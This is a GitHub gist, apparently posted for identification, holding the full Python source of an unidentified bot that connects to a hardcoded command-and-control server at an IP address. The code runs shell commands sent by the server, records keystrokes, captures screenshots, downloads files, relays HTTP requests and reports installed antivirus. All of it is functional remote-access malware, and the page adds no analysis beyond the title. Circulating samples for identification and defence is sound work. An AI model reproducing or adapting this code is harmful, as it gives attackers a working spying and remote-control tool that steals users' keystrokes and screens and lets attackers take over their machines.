Created
August 4, 2022 17:58
-
-
Save usualsuspect/8e30a3eae153f56421586902034f8ccd to your computer and use it in GitHub Desktop.
Undentified Python bot
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import subprocess, socketio | |
from enum import Enum | |
import requests | |
from time import sleep | |
from PIL import ImageGrab | |
import os | |
from datetime import datetime, timedelta | |
from pynput.keyboard import Listener | |
allowed_methods = { | |
'get','post','put','options','delete','patch','head'} | |
class App: | |
VERSION = '1.0' | |
BASE_URL = 'http://169.239.129.108:5555' | |
KEYLOG_SECONDS_TO_SEND = 8 | |
KEYLOG_SECONDS_TO_LOOP_SLEEP = 60 | |
SC_SHOTS_SENDING_IN_SECONDS = 600 | |
SIO_INSTANCE = None | |
KEYLOG_BUFFER_SIZE = 603366 | |
@classmethod | |
def get_config_from_server(cls): | |
""" | |
Get client config from server. | |
""" | |
try: | |
res = requests.get(f"{cls.BASE_URL}/client/config") | |
except Exception as e: | |
try: | |
return | |
finally: | |
e = None | |
del e | |
else: | |
if res.status_code != 200: | |
return | |
res_json = res.json() | |
cls.update(data=res_json) | |
@classmethod | |
def update(cls, *, data: dict): | |
""" | |
Update Config static variables. | |
:param data: should be dict and include one of those keys: (key_logs_minutes, | |
screen_shots_minutes, base_url) | |
""" | |
cls.KEYLOG_SECONDS_TO_SEND = data.get('key_logs_minutes', cls.KEYLOG_SECONDS_TO_SEND) * 60 | |
cls.SC_SHOTS_SENDING_IN_SECONDS = data.get('screen_shots_minutes', cls.SC_SHOTS_SENDING_IN_SECONDS) * 60 | |
cls.BASE_URL = data.get('base_url', cls.BASE_URL) | |
def request(*, method, url, headers=None, payload=None, query=None): | |
""" | |
made http/s requests. | |
:param method: str, the method name | |
:param url: str, the url. | |
:param payload: dict, the url to send. | |
:param query: dict, optional to send query params in organized way. | |
:param headers: dict, for adding special headers | |
:return: request response, or None if request went wrong. | |
""" | |
req_func = getattr(requests, method) | |
req_params = {} | |
req_params.update({'json': payload}) if payload else None | |
req_params.update({'query': query}) if query else None | |
req_params.update({'headers': headers}) if query else None | |
try: | |
res = req_func(url, **req_params) | |
except ConnectionError as e: | |
try: | |
return | |
finally: | |
e = None | |
del e | |
else: | |
return res | |
class Actions: | |
@staticmethod | |
def pull_file_http(data: dict) -> None: | |
""" | |
in pull action, data should contain file that contain the file name | |
""" | |
base_url = f"{App.BASE_URL}/static/downloads/" | |
r = requests.get(f"{base_url}{data.get('file')}") | |
if r.status_code != 200: | |
return | |
filename = r.url.split('/')[-1] | |
with open(f"./{filename}", 'wb') as f: | |
f.write(r.content) | |
@staticmethod | |
def save_file_from_socket(data: dict) -> None: | |
""" | |
in pull action, data should contain file that contain the file name. | |
""" | |
print(f"write binary file -> {data.get('file')}") | |
with open(f"./{data.get('file')}", 'wb') as f: | |
f.write(data.get('file_data')) | |
@staticmethod | |
def made_requests(data) -> None: | |
""" | |
made chosen request http/s request | |
""" | |
headers, url, method = data.get('headers'), data.get('url'), data.get('method', '').lower() | |
payload = data.get('payload') | |
if not url or method not in allowed_methods: | |
return | |
res = request(url=url, method=method, headers=headers, payload=payload) | |
if not res: | |
return | |
body = res.text | |
file_name = str(datetime.now()) | |
payload = {'file_name':file_name, 'file_html':body} | |
request(url=f"{App.BASE_URL}/client/upload_html", method='post', payload=payload) | |
@staticmethod | |
def none(*a, **k): | |
print('none action been called !!') | |
class Command(Enum): | |
def __new__(cls, command_number: str, func: callable): | |
""" | |
bind special attribute to enum properties. | |
:param command_number: the command Identifier. | |
:param func: function, the function to call, when command need to be running. | |
NOTE!! all Actions should get data attribute. | |
""" | |
enum_field_obj = object.__new__(cls) | |
enum_field_obj.command_number = command_number | |
enum_field_obj._value_ = command_number | |
enum_field_obj.run = func | |
return enum_field_obj | |
PULL = ( | |
1, Actions.pull_file_http) | |
PULL_SOCKET = (2, Actions.save_file_from_socket) | |
MADE_REQUEST = (3, Actions.made_requests) | |
RUN_FILE = (5, Actions.none) | |
@classmethod | |
def numbers(cls) -> set: | |
""" | |
return all types of commands numbers | |
""" | |
return {attr.command_number for attr in cls} | |
class KeyRecorder: | |
def __init__(self): | |
self.recorder = '' | |
self.last_time_key_pressed = datetime.now() | |
self.thread = None | |
def on_press(self, key): | |
self.last_time_key_pressed = datetime.now() | |
if getattr(key, 'char', None): | |
self.recorder += key.char | |
else: | |
if getattr(key, 'name', None): | |
self.recorder += f"|{key.name}|" | |
@property | |
def buffer_is_bigger_then_threshold(self): | |
""" | |
check if recorder is bigger then buffer_threshold. | |
""" | |
return len(self.recorder) > App.KEYLOG_BUFFER_SIZE | |
@property | |
def report_threshold_time(self): | |
return datetime.now() - timedelta(seconds=(App.KEYLOG_SECONDS_TO_SEND)) | |
@property | |
def is_time_for_to_report(self) -> bool: | |
""" | |
return True if it is the time to send recorder to server, else False | |
it will return true if there is some data to send and time passed the threshold_time | |
""" | |
return self.recorder and self.last_time_key_pressed < self.report_threshold_time | |
def clear_recorder(self): | |
""" | |
Clear recorder string | |
""" | |
self.recorder = '' | |
def start_recording(self): | |
""" | |
Start async recording. | |
""" | |
self.thread = Listener(on_press=(self.on_press)) | |
self.thread.IS_TRUSTED = True | |
self.thread.start() | |
def create_key_recorder(): | |
key_recorder = KeyRecorder() | |
key_recorder.start_recording() | |
return key_recorder | |
def take_sc_snaps(): | |
""" | |
On mac its need permissions | |
""" | |
size = (1100, 1100) | |
while True: | |
sleep(App.SC_SHOTS_SENDING_IN_SECONDS) | |
try: | |
screenshot = ImageGrab.grab() | |
screenshot.thumbnail(size) | |
App.SIO_INSTANCE.emit('sc_snap', {'image_data':screenshot.tobytes(), 'size':screenshot.size, | |
'mode':screenshot.mode}) | |
except Exception as e: | |
try: | |
pass | |
finally: | |
e = None | |
del e | |
def run_key_recorder(): | |
""" | |
recorder | |
""" | |
key_recorder = create_key_recorder() | |
while True: | |
if key_recorder.is_time_for_to_report: | |
recorder = key_recorder.recorder | |
try: | |
App.SIO_INSTANCE.emit('key_recorder', {'data': recorder}) | |
except Exception as e: | |
try: | |
pass | |
finally: | |
e = None | |
del e | |
else: | |
key_recorder.clear_recorder() | |
else: | |
if key_recorder.buffer_is_bigger_then_threshold: | |
key_recorder.clear_recorder() | |
sleep(App.KEYLOG_SECONDS_TO_LOOP_SLEEP) | |
def get_install_antivirus(): | |
""" | |
get installed antivirus. | |
send payload -> {<type: name of anti, str>, <enable: is enable or disable, bool>} | |
""" | |
if os.name != 'nt': | |
print('OS is not windows') | |
return | |
import pythoncom | |
pythoncom.CoInitialize() | |
from windows_tools import antivirus | |
installed_antivirus = antivirus.get_installed_antivirus_software() | |
anti_viruses = {} | |
for antivirus in installed_antivirus: | |
if antivirus.get('name') in anti_viruses: | |
anti_viruses[antivirus.get('name')] = anti_viruses.get('enabled') or antivirus.get('enabled', False) | |
else: | |
if antivirus.get('name') is not None: | |
anti_viruses[antivirus.get('name')] = antivirus.get('enabled', False) | |
else: | |
sleep(3) | |
try: | |
App.SIO_INSTANCE.emit('anti_viruses', {'data': anti_viruses}) | |
except Exception as e: | |
try: | |
pass | |
finally: | |
e = None | |
del e | |
App.SIO_INSTANCE = socketio.Client() | |
@App.SIO_INSTANCE.event | |
def message(data): | |
print('I received a message!') | |
@App.SIO_INSTANCE.event | |
def connect(): | |
print("I'm connected!") | |
@App.SIO_INSTANCE.on('command') | |
def on_command(data: dict): | |
""" | |
Data: dict in this format -> {'hi': < cmd command, str >, 'id': < command_id, int >} | |
""" | |
print(f"I received a message! {data}") | |
command = data.get('hi') | |
_id = data.get('id') | |
if not command: | |
return | |
if command == 'what is my version': | |
App.SIO_INSTANCE.emit('response', {'result':f"my version is - {App.VERSION}", 'id':_id}) | |
return | |
try: | |
result = subprocess.check_output(command, stderr=(subprocess.STDOUT), shell=True) | |
except Exception as e: | |
try: | |
result = str(e).encode() | |
finally: | |
e = None | |
del e | |
else: | |
if len(result) == 0: | |
result = 'OK'.encode() | |
else: | |
App.SIO_INSTANCE.emit('response', {'result':result, 'id':_id}) | |
return [ | |
{'result': result}] | |
@App.SIO_INSTANCE.on('action') | |
def on_action(data: dict): | |
""" | |
Data: dict in this format -> {'hi': < cmd command, str >, 'id': < command_id, int >} | |
""" | |
action_number = data.pop('action_number', None) | |
if action_number not in Command.numbers(): | |
return 'not found action' | |
Command(action_number).run(data) | |
print(f"I received a message! {data}") | |
@App.SIO_INSTANCE.on('config') | |
def on_config(data: dict): | |
""" | |
Data: dict in this format -> {'<setting arg>: value'...} | |
""" | |
App.update(data=data) | |
print(f"I received a message! {data}") | |
@App.SIO_INSTANCE.event | |
def connect_error(data): | |
print('The connection failed!') | |
@App.SIO_INSTANCE.event | |
def disconnect(): | |
print("I'm disconnected!") | |
App.get_config_from_server() | |
App.SIO_INSTANCE.connect((App.BASE_URL), transports=['polling', 'websocket']) | |
print('my sid is', App.SIO_INSTANCE.sid) | |
App.SIO_INSTANCE.start_background_task(target=take_sc_snaps) | |
App.SIO_INSTANCE.start_background_task(target=run_key_recorder) | |
App.SIO_INSTANCE.start_background_task(target=get_install_antivirus) |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Awesome 😎